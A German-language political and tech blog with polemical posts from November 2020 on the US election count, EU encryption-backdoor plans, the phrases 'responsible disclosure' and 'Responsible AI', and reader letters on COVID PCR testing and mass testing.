Hier gibt es einen überlebenden Fetzen von CNN. Trump lag 109000 Stimmen in Führung und dann kommen mysteriös 120000 Stimmen für Biden rein.
Die Moderatoren haben verborgene Headsets im Ohr, über die die Redaktion im Hintergrund ihnen Durchsagen einflüstert. In diesem Fall hat die Redaktion erst das Bild geändert und dann den verwirten Moderatoren Dinge geflüstert, die solange wie deaktivierte Roboter eingefroren stehenbleiben, was dem ganzen eine sehr surreale Aura gibt.
Ich nehme ehrlich gesagt nichts von diesem Wahlbetrug-Gelaber ernst. Wahlbetrug ist ein Mittel der Machthaber um an der Macht zu bleiben. Die Machthaber sind die GOP. Der Biden-Sieg gerade kam von GOP-Bundesstaaten, die "geflippt" sind. Die Infrastruktur vor Ort lag in den Händen der GOP. Das Narrativ, dass hier fiese Democrats Dinge tun, um die GOP zu benachteiligen, ergibt überhaupt keinen Sinn.
Wahlbetrug war und ist in den USA ein großes Problem, keine Frage, aber das ist mit geradezu erdrückender Mehrheit bisher immer Wahlbetrug der GOP gewesen. Dass ausgerechnet die sich jetzt trauen das Wort Wahlbetrug in den Mund zu nehmen, das ist wirklich mehr als lächerlich.
Update: Falls trotzdem jemand eine Erklärung für den Videofetzen haben will: Ein Leser hat sich mal die Mühe gemacht.
Hat mich 10 Minuten gekostet. Aber wer macht sich schon so viel Mühe *sigh*
https://twitter.com/DaphneChen_/status/1324052391159889921
https://www.politifact.com/article/2020/nov/04/fact-checking-avalanche-wisconsin-election-misinfo/
Gerade der Link hier ist interessant:
"Wisconsin law requires the results of those absentee ballots be reported all at once, Wisconsin Elections Commission Administrator Meagan Wolfe explained Wednesday."
https://www.usnews.com/news/business/articles/2020-11-04/trump-and-allies-spread-falsehoods-to-cast-doubt-on-election
Das hat man davon, wenn man den eigenen Leute von der Briefwahl abrät, die Demokraten-Wähler das wegen Corona aber rege nutzen...
[l] Übrigens, falls ihr euch fragt: Könnte der Trump sich einfach weigern, sein Amt zu räumen?
Ja, könnte er.
Die Contingency-Mechanismen in den USA sind nicht ordentlich durchdacht.
Nehmen wir mal an, Trump erkennt die Wahl nicht an.
Der Mechanismus ist, dass die Staaten Abgesandte nach Washington schicken, die dort ansagen, wie in ihrem Bundesstaat die Wahl ausgegangen ist. Was passiert denn jetzt, sagen wir mal, wenn die unterlegene Partei einfach andere Leute zum Electoral College schickt, die sagen: Stimmt gar nicht, die anderen Leute waren illegitim. Hier ist das wahre Ergebnis: Trump hat gewonnen. In dem Fall sieht das System vor, dass die Angelegenheit im Unterhaus entschieden wird. Aber halt, nicht eine Stimme pro Abgeordneter. Eine Stimme pro Bundesstaat.
So und da wird es spannend, denn es gibt mehr Bundesstaaten mit Republikaner-Mehrheit. Da wohnen zwar insgesamt trotzdem weniger Leute als in den Bundesstaaten mit Democrats-Mehrheit. Aber es gibt mehr von ihnen.
Die Vertreter der Bundesstaaten dort könnten einfach die Wahlergebnisse ignorieren und Trump zum Präsidenten ernennen.
Das wäre offensichtlich undemokratisch, ein Staatsstreich. Aber halt ein legaler, wenn man formaljuristisch nach der Verfassung geht.
Update: Wenig überraschend ist das mal wieder alles noch schlimmer als man annehmen würde. Es gibt auch das Phänomen der Faithless Electors, d.h. sagen wir mal in Hawaii gewinnen die Democrats, und schicken einen Wahlmann nach Washington, aber der stimmt dann dort für Bernie Sanders und nicht für Hillary Clinton. Das ist tatsächlich vorgekommen. Die meisten Bundesstaaten haben daher Gesetze für diesen Fall gemacht. (Danke, Rüdiger)
[l] Zu dem Kayfabe kamen noch ein paar Hinweise rein. Erstens wiesen mehrere Kerbal-Player darauf hin, dass Weltraummüll auf einer elliptischen Laufbahn sein kann und dann doch im selben Orbit schneller wäre. Das erscheint mir jetzt nicht klar, wieso Weltraummüll auf einem elliptischen Orbit sein sollte, aber gut, geschenkt. Dann nehmen wir halt den anderen beliebten Weltraumfilmfehler: Dass man im Vakuum Gefechtslärm hört.
Dann wies jemand darauf hin, dass das Konzept auch schon mal bei Adam Curtis verarbeitet wurde, allerdings nicht unter dem Namen Kayfabe sondern als Hypernormalisation. Ich hatte das schon mal empfohlen aber Adam Curtis kann man gar nicht oft genug empfehlen, daher auch hier nochmal: Klare Guckempfehlung. Ist allerdings zweieinhalb Stunden lang. Und man braucht danach ein-zwei Tage, bis man wieder runtergekommen ist.
Update: Haha, ihr macht mich alle fertig. Jetzt kommt hier einer und meint, dass man Explosionen im Vakuum doch hören kann, wenn man nahe genug dran ist, dass man die bei der Explosion ausgestoßenen Gase abkriegt. Die dienen dann als Transportmedium für den Ton. Hier hat jemand ein Video dazu gemacht.
[l] Hey Fefe, wieso warnst du eigentlich immer so vor Burying?
Das kriegt man doch mit, wenn da was wichtiges passiert!
Ach? Tut man? Wie viele von euch haben mitgekriegt, dass der EU-Ministerrat einen Terroranschlag auf die EU durchgeführt hat?
Im EU-Ministerrat wurde binnen fünf Tagen eine Resolution beschlussfertig gemacht, die Plattformbetreiber wie WhatsApp, Signal und Co künftig dazu verpflichtet, Generalschlüssel zur Überwachbarkeit von E2E-verschlüsselten Chats und Messages anzulegen.
Ach nee. Ach was. Das ist ja schon eher wichtig.
Das heißt, dass die Paranoiker natürlich mal wieder die ganze Zeit richtig lagen.
Insbesondere heißt es, dass man ab jetzt keinen Diensten mehr vertrauen kann, selbst wenn man den Betreiber persönlich kennt und für vertrauenswürdig hält.
Ich weiß, was ihr jetzt denkt, und ihr habt Recht. Das können die Sesselfurzer vom EU-Ministerrat doch unmöglich in fünf Tagen selbst erarbeitet haben. Haben sie auch nicht. Das ist die praktisch wörtliche Umsetzung der Vorgabe der Five Eyes. Die wissen nämlich genau: Wenn es erstmal eine Krypto-Hintertür gibt, dann können NSA und GCHQ die nutzen, um die EU abzuhören. Und zwar nicht nur so ein bisschen. Nein, nein. Flächendeckend.
Auch wenn es jetzt den Eindruck erweckt, der Vorschlag käme von Frankreich: Tut er nicht.
Frankreich treibt das ursprünglich von Großbritannien angestoßene Vorgehen gegen sichere Verschlüsselung auf Plattformen wie WhatsApp bereits das ganze Jahr auf EU-Ebene über voran.
Ja, richtig gelesen. Frankreich verrät alle EU-Bürger an die Five Eyes, auf Geheiß eines Five-Eyes-Mitglieds, DAS SEINEN FUCKING AUSTRITT AUS DER FUCKING EU ERKLÄRT HAT.
Jetzt denkt ihr euch wahrscheinlich: Betrifft mich nicht. Update ich halt meine Client-Software nicht mehr, bin ich nicht betroffen. So einfach ist das leider nicht. Die meisten Krypto-Messenger sehen eine betreiberseitige Infrastruktur vor, über die man Schlüssel von potentiellen Kommunikationspartnern abfragen kann. Gute Software sieht dann auch einen Weg der manuellen Verifikation vor, aber das ist halt mit Aufwand verbunden, und die üblichen Verdächtigen unter den Saboteuren und Vollidioten haben ja seit Jahrzehnten eine Kampagne gegen Krypto-Software gefahren, dass die "zu schwer zu bedienen" sei und man daher die Komplexität vor den Nutzern verbergen müsse. Das hat dazu geführt, dass die Schlüssel-Übernahme bei praktisch allen Programmen implizit läuft. Als Gegenbeispiel fällt mir gerade nur Threema ein -- und GnuPG. Ja, das GnuPG, das seit Jahrzehnten den Hass der Deppen abkriegt, weil es angeblich so schwer zu bedienen sei.
Wenn Signal per Gesetz zu Hintertüren gezwungen wird, hilft dir jedenfalls auch die ganzen verifizierten Builds nichts und dass der Client-Quellcode Open Source ist. Signal hat sich entschieden, die Krypto-Komplexität vor dem Nutzer zu verbergen, und das bedeutet für das Szenario dann halt, dass der Nutzer wahrscheinlich nicht merken würde, wenn ihm ein falscher Schlüssel untergeschoben wird.
Aber Achtung: Nur weil ich sage dass GnuPG immun ist, heißt das nicht, dass eure Software oberhalb von GnuPG OK ist. Wenn die Software Schlüssel automatisch von irgendwelchen Diensten holt, oder wenn eure Ver- und Entschlüsselung auf irgendeinem Dienst und nicht auf eurem Privatrechner läuft, oder wenn ihr nicht manuell Fingerprints per Telefon oder sonstigem Seitenkanal abgeglichen habt, dann seid ihr Five-Eyes-Futter.
Die Zeit für halbherzige Krypto ist vorbei. Jetzt müssen wir alle in den Freiheitskämpfer-Modus wechseln. Und jetzt ist der Zeitpunkt, wo ihr alle versteht, wieso die Krypto-Anarchisten in ihrer Software einen Freiheitskämpfermodus vorgesehen haben.
Update: Hier vertritt jemand die These, dass Erich überreagiert. Ich finde nicht, dass man in solchen Fragen überreagieren kann. Dass die EU das alleine diskutiert ist in meinen Augen schon ein durch nichts zu entschuldigender Hochverrat. Die EU hat nichts, aber auch gar nichts, auch nur in der Nähe von meinen Krypto-Chats zu suchen.
Update: Wer mein Terror-Bingo schon länger mitspielt, kennt die Muster schon. Aber der Vollständigkeit halber: Es gibt natürlich mal wieder eine Geheimdienst-Verbindung und die Dienste haben so massiv und vollständig verkackt, dass Österreich sogar den Chef des "Verfassungsschutzes" abberufen hat. Wenn die Unterdrückungsbehörden Krypto-Backdoors kriegen, wird das keinen einzigen Anschlag verhindern. Es wird nur dazu führen, dass sie noch großflächiger hätten informiert sein können aber es wegen "Pannen" nicht waren. Ich finde ja, wer so ein Versagen "Panne" nennt, sollte direkt mitgefeuert werden. Eine Panne ist, wenn du das richtige tun wolltest, aber dich technisches Versagen der Infrastruktur daran gehindert hat. Wenn du informiert warst aber deinen Job nicht getan hast, dann ist das Versagen, keine Panne.

Sun Nov 8 2020

[l] Oh wow. Ich war mir so sicher, das mal gebloggt zu haben, aber habe ich offenbar nicht.
Das Konzept, dass das Publikum mitspielt, und so tut, als sei das alles hier gerade echt, und zwar wider besseren Wissens, das nennt man "Kayfabe". Ich habe das vor drei Jahren in diesem New York Times-Artikel gelernt, aber das Konzept ist älter und hat sogar einen Wikipedia-Artikel.
Eine weniger stark ausgeprägte Version davon gibt es auch in Filmen, wenn man im Kino sitzt, und Fehler oder Widersprüche ignoriert. Bei Astronautenfilmen ist z.B. "wenn der von hinten kommende Weltraummüll schneller flöge, wäre er in einem anderen Orbit und könnte dort nicht mit unserem Helden kollidieren" ein typischer Fehler, den man aber ignoriert, weil man weiß, dass es ein Unterhaltungsfilm ist, kein Dokumentarfilm. Dort nennt sich das "suspension of disbelief". Im Wrestling nennt man das Kayfabe.
Ich finde, das Konzept trifft auch prima auf die Politik zu. Auch Politik in großen Firmen.
Später habe ich dann gemerkt, dass Eric Weinstein das Konzept schon 2011 verallgemeinert hat. Eric hat Jahre später bei Joe Rogan im Podcast nochmal über Kayfabe geredet und da eine schöne Story erzählt. Vince McMahon ist der Eigentümer der World Wrestling Fedaration (John Oliver hat über den und sein Business auch mal eine Sendung gemacht, ist kein Sympathieträger).
Update: Wegen eines Rechtsstreits mit der Umweltorganisation WWF mussten die sich zu World Wrestling Entertainment umbenennen.

Sat Nov 7 2020

[l] Joe Biden ist der nächste US-Präsident.
Pennsylvania hat wohl das offizielle Ergebnis pro Biden bekanntgegeben, und dann sah es ein paar Minuten so aus, als würden die anderen News Orgs alle darauf warten, dass Fox News das Rennen callt. Aber CNN wurde dann doch hippelig und hat es als erste rausgehauen. Jetzt hat es aber auch die Associated Press gesagt und viel offizieller wird es nicht.
Ich habe ja schon zusammengefasst, wofür Joe Biden bisher so stand. Hoffen wir, dass er altersmilde geworden ist und nicht erstmal ein paar neue Kriege oder Drohnenmordkampagnen anfängt wie das letzte Mal, als er was zu sagen hatte.
Update: Ich hatte befürchtet, das Trump wieder gewinnt. Auf der einen Seite bin ich froh, falsch gelegen zu haben. Auf der anderen Seite hat Joe Biden bisher nicht viel Anlass zu Hoffnung gegeben. Insofern schlage ich vor, dass wir da jetzt alle verhalten optimistisch rangehen. Vielleicht werden wir ja positiv überrascht.
Update: Der virale Clip zur Wahl ist der CNN-Anchor, der spontan in Tränen ausbrach.
Update: Die Schlagzeile zur Wahl kommt von The Onion:
Jubilant Reaction To Trump Defeat Quickly Soured By News Of Biden Win
Schöner kann man das kaum auf den Punkt bringen :-)
Update: Stellt sich raus: Pennsylvania ist doch noch nicht offiziell. AP fand bloß, dass Biden uneinholbar vorne war. m(
Lustigerweise versuchen die Republikaner jetzt die Wahl anzuzweifeln mit Verweis auf kaputte Wahlcomputer. Da kann ich ja echt nur heiser lachen. Solange die dachten, die Wahlcomputer würden die Democrats benachteiligen, sahen sie keinen Handlungsbedarf, aber JETZT kommen sie damit? Das Ausrollen der Wahlcomputer geht auf George W Bush zurück, wenn ihr euch erinnert. Damals mit dem offensichtlichen Ziel (ihr erinnert euch an die Hanging Chads in Florida), die Democrats um ihren Wahlsieg zu bescheißen. Tja, liebe Republicans. Ihr liegt in dem Bett, das ihr euch gemacht habt.

Fri Nov 6 2020

[l] Wenn ihr euch gerade ein bisschen durch internationale Medien klickt, dann fallen zwei Dinge auf.
Erstens: Wer diese Tage irgendeine Zeitung von irgendwo auf der Welt aufmacht, wird auf der Titelseite die US-Wahlen sehen. Das muss man sich mal auf der Zunge zergehen lassen. Tretet mal einen Schritt zurück und überlegt euch, was das heißt. Und ob ihr irgendein anderes Land nennen könnt, wo während der Auszählung weltweit in allen Zeitungen tagelang der Zwischenstand getickert wird. Russland? China? Kein Land außer den USA hat so eine Dominanz weltweit. Es ist fast so, als hätten wir es hier mit Dem Imperium zu tun, gell?
Zweitens: Die Kommentatoren da draußen haben in den letzten vier Jahren genau Null geistigen Fortschritt oder Reflektion vorzuweisen. Nichts. Gähnende Leere zwischen den Ohren. Wie, der Biden hat gar nicht am Wahlabend einen Durchmarsch hingelegt? Wie, Trump kam so knapp ran? Wie, Trump hat gerade mehr nicht-weiße Stimmen für die Republikaner geholt als irgendein anderer GOP-Präsidentschaftskandidat in den letzten 60 Jahren?
Alle sind sie schockiert. SCHOCKIERT!! Entsetzt! Wie konnte das kommen?
Dabei lagen unsere Prognosen doch genau wie vor vier Jahren bei einem klaren Wahlsieg von Biden!!1!
Die Antwort ist erschütternd einfach und wird hier von Jimmy Dore wunderbar auf den Punkt gebracht: Nach einem Sommer der Massenproteste gegen die Ungerechtigkeit des Polizei- und Justizapparats stellen die Democrats ausgerechnet den Typ als Kandidaten auf, der für die Crime Bill verantwortlich war, die die ganzen Schwarzen wegen Drogendelikten eingebuchtet hat. Als Vizepräsidentin schlagen sie "California's Top Cop" vor.
Und dann wählen die Schwarzen und Latinos lieber GOP? Also DAMIT konnte ja wohl NIEMAND rechnen!1!!
Man hätte vielleicht die Pandemie nutzen können, um das Gesundheitssystem zu reformieren. Aber die Democrats haben lieber Trump-Bashing gemacht. Klar, wenn du selber kein Programm hast, bleibt ja nur stumpfes Bashing. Scheiße nur, wenn die Bürger das spüren, dass du kein Programm hattest.
Aber hey, nach dem zweiten Schlag auf den Hinterkopf werden sie doch was merken, die Democrats, oder? Oder? Stellt sich raus: Nein. Schuld ist nicht die Partei sondern der Wähler.
Falls sich übrigens jemand denkt, hey, vielleicht sind die Amis einfach reaktionäre Betonköpfe und wollen keine progressive Agenda: Doch, wollen sie. Aber die bietet ja keiner an.
Aber hey, progressive Politik ist einfach uncool. Niemand geht damit hausieren. Außer dem Corbyn. Und so wie Corbyn will keiner enden, schon klar.
Dann lieber angepasste Neocon-Politik zu Lasten der Bevölkerung machen wie alle anderen.

Wed Nov 4 2020

[l] Leserbrief mit der Gegenposition zur Frage, ob Trump oder Biden gewinnt:
Ich würde deiner Wahlanalyse mal widersprechen wollen. Es gibt gute Gründe, dass Biden gewinnt, auch wenn es von den Staaten her grade anders aussieht.
Gucke darauf, welche Counties in den sauknappen staaten zurückliegen mit der Zählung.
Habe mal ein bisschen Stichproben gemacht: zB in Georgia sind die Counties, die am langsamsten zählen, Demokratisch und urban, haben also eine große Einwohnerzahl. Beispiel: Fulton County hat eine Million Einwohner, das sind knapp 10% von Georgia. Da fehlen 20% der Stimmen, also 2% Georgia-weit. Das ist mehr als der Abstand zwischen Trump und Biden. Solche Schalter genügen, um ein Country rumzudrehen, und das kann dann die Wahl drehen, weil Trump die verbleibenden Staaten mit Tendenz zu ihm alle braucht (im Moment Michigan, Pennsylvania, Georgia, und North Carolina).
Diese Kippschaltersituationen mit urbanen, demokratischen, überproportional großen Supercounties finden sich in mindestens drei der fraglichen Bundesstaaten, wenn ich das richtig gesehen habe. Legt nur ein Supercounty davon den Schalter um, Gewinnt Biden (wenn auch knapp). Das ist nicht so unwahrscheinlich.
Wenn ich auch noch keinen Gewinner der Wahl benennen kann, der Verlierer steht fest - und das sind die Demoskopen. Die lieben in ihrer eigenen Filterblase und scheinen potentielle Trumpwähler lieber gar nicht erst zu fragen.
[l] Wenn ihr übrigens dachtet, die potentielle Wiederwahl von Donald Trump sei die schlimmste Nachricht heute, dann habt ihr eure Rechnung ohne Altmaier gemacht. Der will das "Leistungs""schutz""recht" ausbauen und u.a. die Fair-Use-Regelung für nichtkommerziellen Privatgebrauch rausnehmen. Begründung (festhalten!!):
Ein solcher Eingriff sei von der neuen EU-Urheberrechtsrichtlinie aber nicht vorgesehen, schreibt das BMWi in einer heise online vorliegenden Eingabe an das Justizressort.
Und wer ist Schuld an der EU-Richtlinie fragt ihr? Da reichen sich Axel Voss und Peter Altmaier (beide CDU, na sowas!) das Geldsäckel der Verlagslobbyisten weiter.
Wo wir gerade bei der CDU waren: Deren Lügen waren natürlich mal wieder nicht das Papier wert, auf dem sie ausgedruckt wurden:
Die CDU selbst hatte in einem Positionspapier voriges Jahr genau aus diesem Grund zugesichert, auf solche Ausnahme vom exklusiven Verwertungsrecht zu setzen und Alltagsnutzungen im Netz pauschal vergütet wissen zu wollen.
Falls ihr jetzt denkt: Ach naja, ein freidrehender CDUler im Wirtschaftsministerium, der wird sicher von den anderen Ministerien gestoppt, die noch mehr Hirnzellen übrig haben! Dann hab ich schlechte Nachrichten für euch:
Kulturstaatsministerin Monika Grütters unterstützt das Anliegen ihres Parteikollegen Altmaier
Die ist übrigens AUCH bei der CDU. Na sowas! Aber komm, wenigstens im Justizministerium gibt es noch Reste von Hirnstamm zwischen der Korruption?
... begrüßt Grütters, dass das Justizministerium die zunächst vorgesehene Grenze von acht lizenzfreien Wörtern gestrichen habe
Aber aber aber wenigstens das Bundesforschungsministerium...? Da sitzen doch die schlauen Leute!!1!
Das Bundesforschungsministerium begrüßt den Entwurf dagegen grundsätzlich.
Gemeint ist die alte Fassung, wenn ich das richtig lese. Das Forschungsministerium wäre also tatsächlich der eine Stein in der Brandung der Korruption und Inkompetenz.
Aber wartet, die Meldung ist noch nicht rund. Der Eisberg geht noch tiefer.
Das BMWi opponiert derweil weiter gegen das Vorhaben, dass Urheber über eine Verwertungsgesellschaft mindestens zu einem Drittel an den Einnahmen des Presseverlegers beteiligt werden sollen. Dies gefährde die Privatautonomie der Parteien. Abgesehen werden sollte zudem davon, auch die Höhe der Verlegerbeteiligung gesetzlich auf maximal ein Drittel zu begrenzen.
Das Wirtschaftsministerium hat sich damit auf das Niveau des Verfassungsschutzes begeben. Jedenfalls in dem, was ich dafür als Zukunft sehen und fordern kann. Reformfähigkeit sehe ich da keine mehr. Alles zumachen und niederbrennen. Personal komplett austauschen. Die alte Riege komplett wegen Korruption in den Knast packen.
Und ich erwarte eine schriftliche Entschuldigung von all den Deppen, die den Altmaier damals als "digital native" bejubelt haben, weil er als erster in der CDU einen Twitteraccount hatte.

Tue Nov 3 2020

[l] Fandet ihr das damals auch hochnotpeinlich, als das ZDF ihren Chef-Seriositätssimulanten Steffen Seibert an das Kanzleramt verlor?
Was der Seibert macht ist seine Sache, aber das ZDF hat damit doch jede Glaubwürdigkeit als unabhängige Nachrichtenquelle verloren!
Gut, hatten sie auch vorher nicht so viel, immerhin wurde das ZDF als Regierungs-Presseerklärungs-Vorlese-Portal gegründet, als die ARD sich als zu unabhängig herausstellte (schon bei der ARD kann man ja nur heiser über die Vorstellung lachen, die seien zu unabhängig).
Aber das ZDF hat Marietta Slomka, die alleine mehr Unabhängigkeit demonstriert hat als der Rest von ARD und ZDF zusammen. Insofern kommen sie netto doch auf einen positiven Punktestand.
Vom Kanzleramt als Pressefuzzy eingestellt zu werden stelle ich mir jedenfalls als Todesstoß jeder journalistischen Karriere vor. Eine tödliche Giftpille. Den Gestank, die Kanzlerin habe einen für die Arschkriecherei vorher belohnen wollen, wird man nie wieder los. Das reflektiert auch auf den vorherigen Arbeitgeber. Wer Leute einstellt, die danach von der Kanzlerin als Pressefuzzy eingestellt werden, hat auf ganzer Linie versagt. Da liegt die Annahme nahe, dass auch alle anderen dort angestellten Journalisten sich bloß auf eine Karriere als Redenschreiber bewerben mit ihrer "Berichterstattung".
Nach all der Vorrede jetzt der Grund, wieso ich das hier erwähne: Guckt mal, von wo Flintenuschi ihren neuen Redenschreiber rekrutiert hat.
Au weia.
Ich brauche da glaube ich mal ein noch abwertenderes Schimpfwort.
Update: Dem Typen selbst mache ich keine Vorwürfe. Leben kosten Geld, da muss jeder mehr oder weniger üble Kompromisse machen. Ich finde es ehrlicher, wenn der Redenschreiber für Zensursula auch offen dafür bezahlt wird und Steuern zahlt. Ist mir viel lieber als die ganzen anderen Regierungs-Unterseeboote in den Medien, und die ganzen "Transatlantiker" und so weiter. Die dann aber nach außen so tun als seien sie Journalisten und es ginge ihnen um die Wahrheitsfindung.
Aber das ehemalige Nachrichtenmagazin wird jetzt halt den Gestank nicht loswerden, dass die Politik aus den Reihen ihrer "Journalisten" rekrutiert hat. Ich an deren Stelle fände das jedenfalls peinlicher als die Relotius-Nummer. Der hat das ja nicht gemacht, um sich der Politik als Redenschreiber anzudienen. Aber in dem Verdacht stehen jetzt halt alle anderen in deren Redaktion. (Danke, Philipp)
[l] Kennt ihr "responsible disclosure"?
Das ist ein Bullshit-Konzept von Großkonzernen wie Microsoft. Die wollen damit sagen, dass Leute, die Bugs in ihren Produkten veröffentlichen, unverantwortlich handeln.
Also eigentlich wollen sie damit sagen: DIE sind Schuld, nicht wir, dass unsere Produkte kacke sind, es jeder weiß, und eure Daten nicht sicher sind, wenn ihr sie uns anvertraut.
Es gibt ein Vorbild für diese PR-Kampagne, und ich hatte sie auch schonmal hier im Blog: Jaywalking. Wurde von den Automobilkonzernen erfunden, um die Schuld an den ganzen toten Kindern im Straßenverkehr von sich weg zu den Opfern zu schieben. Unser Produkt tötet Kinder? Na hätten die sich mal "responsible" verhalten und nicht auf der Straße gespielt!
Und jetzt gibt es Iteration 3 von dem Konzept: "Responsible AI". Unsere KI-Produkte töten Menschen? Das heißt nicht, dass KI grundsätzlich verwerflich ist, nein, nein, das heißt, dass hier KI nicht "responsible" eingesetzt wurde!!1! Das war ein bedauerlicher Einzelfall, vergleichbar etwa mit Nazi-Fanartikeln bei Polizisten. Das ist eine ganz fiese Nummer und ihr solltet euch da nicht verarschen lassen.
Ihr mögt Accenture nicht? Dann guckt bei PwC! Oder bei Microsoft. Oder bei Google. Oder bei Tensorflow. Es sind auch schon ansonsten reputable Forschungseinrichtungen auf den Zug aufgesprungen. Klar, man will nicht das Blut an den Händen haben, aber auf die Forschungsmittel will man auch nicht verzichten. Da muss eine PR-Kampagne her.
Wisst ihr, was mir jetzt noch fehlt?
Responsible Crypto Currency.
Ich bin ehrlich erstaunt, dass die Ethereum Foundation das noch nicht gemacht hat. Die haben ja auch ein fettes PR-Problem. In deren Umfeld suchen Journalisten seit Jahren nach seriösen Marktteilnehmern und finden keine. Die eine Hälfte ist Schall und Rauch-Projekte, groß angekündigt und dann hat man nie wieder was gehört, und der Rest sind Scammer und Ransomware-Erpresser. Regelmäßig verlieren Leute ihre Einlagen wegen eines "Hacks" oder Währungen müssen geforkt werden, weil es da ein bedauerliches anders nicht korrigierbares Sicherheitsproblem gab. Man würde denken, wenn es eine Branche gibt, die mal irgendwas mit responsible braucht, dann wären es die.
Oh, wartet, einen hab ich noch vergessen. Responsible encryption. Das war der Euphemismus für "ihr müsst alle Hintertüren für den Staat einbauen in eure Krypto-Produkte".
Kurz: Wenn irgendwo responsible draufsteht, ist das vergiftet. Einen klareren Indikator für "ist vergiftet" gibt es gar nicht. Das ist jedenfalls nie responsible und schon gar nicht zu eurem Nutzen.
Responsible AI, my ass.

Sun Nov 1 2020

[l] Und noch ein Leserbrief:
Der größte Fehler an dieser „Single-Target-PCR-Test“-Behauptung ist der, dass die humanen Coronaviren ein ziemlich *anderes* Spike haben als Covid19! Das eine sind Alpha-Coronaviren, das andere Beta-Coronaviren. Zwischen Alpha-Test und Beta-Test hat Bill Gates diese Viren praktisch komplett umgeschrieben (*scnr*). Am nächsten dürfte noch HCoV-NL63 sein, dessen Spike auch an ACE2 bindet; die anderen HCoVs binden sogar an andere Rezeptoren, und unterscheiden sich wohl noch mehr.
Und die Proteine kann man ja einfach angucken, es gibt da eine Online-Datenbank dafür, und die haben sogar ein Tool, um Alignments zu machen, also zu gucken, welche Sequenzen so ähnlich sind. Das ist sogar gut bedienbar, man wirft einfach seine Proteine in den Einkaufswagen und macht dann „Align“. Ich hab das mal gemacht, ich hoffe, der Link ist nutzbar:
https://www.uniprot.org/align/A202011015C475328CEF75220C360D524E9D456CE001DE2X
Das wird dann mit * markiert, was gleich ist. Jetzt hast du sicher in Bio aufgepasst, und weißt, dass eine Aminosäure (das wird hier verglichen) 3 Basen sind. Das längste gleiche Stück, das ich sehe, sind 6 Aminosäuren, also 18 Basen. Das könnte man, wenn man wirklich wollte, als PCR-Primer verwenden, um sowohl HCoV-NL63 als auch SARS-CoV-2 nachzuweisen. Davon gibt es drei, zwei davon recht nah beieinander, also ja, damit könnten man einen PCR-Test machen, der tatsächlich das leistet, was die VTler behaupten: HCoV-NL64 *und* SARS-CoV-2 single-target gleichzeitig nachweisen.
Die Targets für die PCR-Tests sind öffentlich, und natürlich nutzt man diese Sequenzen gerade nicht. Man nutzt eindeutige, stabile Regionen, die es allenfalls noch in SARS-CoV-1 gibt, denn da stört eine Kreuzreaktivität nicht. Ein Alignment damit habe ich auch mal gemacht, da sieht man, wie innerhalb der gleichen Familie dann doch massiv mehr Ähnlichkeiten sind:
https://www.uniprot.org/align/A20201101E5A08BB0B2D1C45B0C7BC3B55FD26556001E0E5
Das ist voller *************.
Leute, das Tool ist zugänglich. Wer das Tool nicht nutzt, wenn er über PCRs und Kreuzreaktivität faselt, ist ein verdammter Idiot.
Das ist einfach Scheiße, wenn man dann seinen Professor-Titel für so eine inkompetente Analyse hergibt, in einem Fachbereich, von dem man einfach absolut null Ahnung hat, und nicht mal die Internet-Tools bedienen kann, die da angeboten werden.
Tut mir bitte einen Gefallen und arbeitet euch nicht an diesem Typen ab. Das bringt niemandem was.
Der Mann ist kein Idiot, der ist Professor. Wir sollten den auf unsere Seite zu ziehen versuchen anstatt ihn zu beschimpfen.
[l] Spannender Leserbrief zu China und Notstand:
Die Slowakei versucht jetzt, das Modell Chinas, mit dem die ihre Präfekturen mit Covid-Ausbrüchen wieder „sauber“ bekommen, auf ihr ganzes Land zu übertragen. Da die Slowakei von der Größe her eine eher kleinere chinesische Präfektur wäre, ist das auf jeden Fall übertragbar.
Wer nicht getestet werden will, kann alternativ einfach 10 Tage 100% Selbstisolation wählen.
Ich glaube, dass sie nicht alles richtig kapiert haben, denn die Chinesen koppeln die zwei Tests im Abstand von einer Woche mit einer Quarantäne, wobei sie in der Regel den ersten Test nutzen, um das eigentlich betroffene Gebiet zu identifizieren (d.h. die Landkreise der Präfektur, die mit 0 positiven Tests aus Test 1 rauskommen, werden dann sofort wieder geöffnet, und bekommen auch keinen zweiten Test).
Die zweite Runde in Shufu, dem Landkreis in der Präfektur Kashgar, in dem der Ausbruch war, hat übrigens 14 positive ergeben; die Leute dort im Landkreis waren jetzt alle eine Woche in Quarantäne.
Das ist gut so, denn die durch die Quarantäne hat man jetzt verhindert, dass diese 14 wieder andere angesteckt haben, und ohne Quarantäne wären das nämlich schon wieder 70, von denen du nicht weißt, wer, weil die noch nicht positiv sind.
Der Ausbruch war laut diverser westlicher Medien in einer dieser neuen Turnschuhfabriken in Xinjiang, die laut KP dazu dienen, den verarmten Leuten dort Berufschancen zu geben, und die laut Adrian Zenz „Zwangsarbeit“ sind. Du weißt ja, bei dieser Sorte Neoliberalen ist „sozial, was Arbeit schafft“, außer, es ist die KP, dann sind solche Programme natürlich ganz üble „Zwangsarbeit“…
Ich hoffe ja, dass die slowakische Massentesterei trotz der ganzen offensichtlichen Implementierungsfehler und der vielleicht öfter mal falsch negativen Schnelltests dort trotzdem ein passabler Erfolg wird, und dann Nachahmer findet, auch wenn sie vielleicht noch ein zweites Mal verbessert durchgeführt werden muss, weil das jetzt so von meinem Verständnis her eine billige Kopie der sehr durchdachten chinesischen Methode ist, und die billige Kopie halt Qualitätsmängel hat, die mitten in einem viel heftigeren Ausbruchsgeschehen als das in Kashgar jetzt natürlich nicht mehr vernachlässigbar sind.
Jedenfalls: Es gibt sehr wohl Strategien, wie man egal wann und bei welchem Wetter so eine Epidemie wieder einfangen kann, ohne dass es lang dauert und viel schadet oder exzessiv kostet. Die mittelalterliche Wuhan-Methode (die auch im Winter funktioniert, aber halt 12 Wochen braucht) ist ja nur nötig, wenn man noch keine Massentests zur Verfügung hat, sondern während des Lockdowns erst anfängt, modernere Methoden zu entwickeln.
Was mich am meisten stresst an der Pandemie, ist, dass ich einfach immer wieder nach China gucke, und sehe, dass die es dort besser machen. Und dabei einfach auch schneller ihr besser machen weiter verbessern. Und hier einfach niemand in der Lage ist, dorthin zu gucken, und das nachzumachen. Da brauche ich dann immer fassweise Schwielencreme vom Facialpalmieren.
Wobei die Slowakei ein entspannender Hoffnungsfunken ist. Aber wenn man derart zurückgefallen ist wie wir jetzt, muss man die chinesische Methode wirklich 1:1 kopieren. Der Versuch, das zu kopieren und gleichzeitig zu verbessern, kann aufgrund unseres Rückstands nur einen Verlust an Qualität zur Folge haben. Und beim Kopieren fragt man am besten auch jemand, der sich auskennt, und lässt sich helfen.
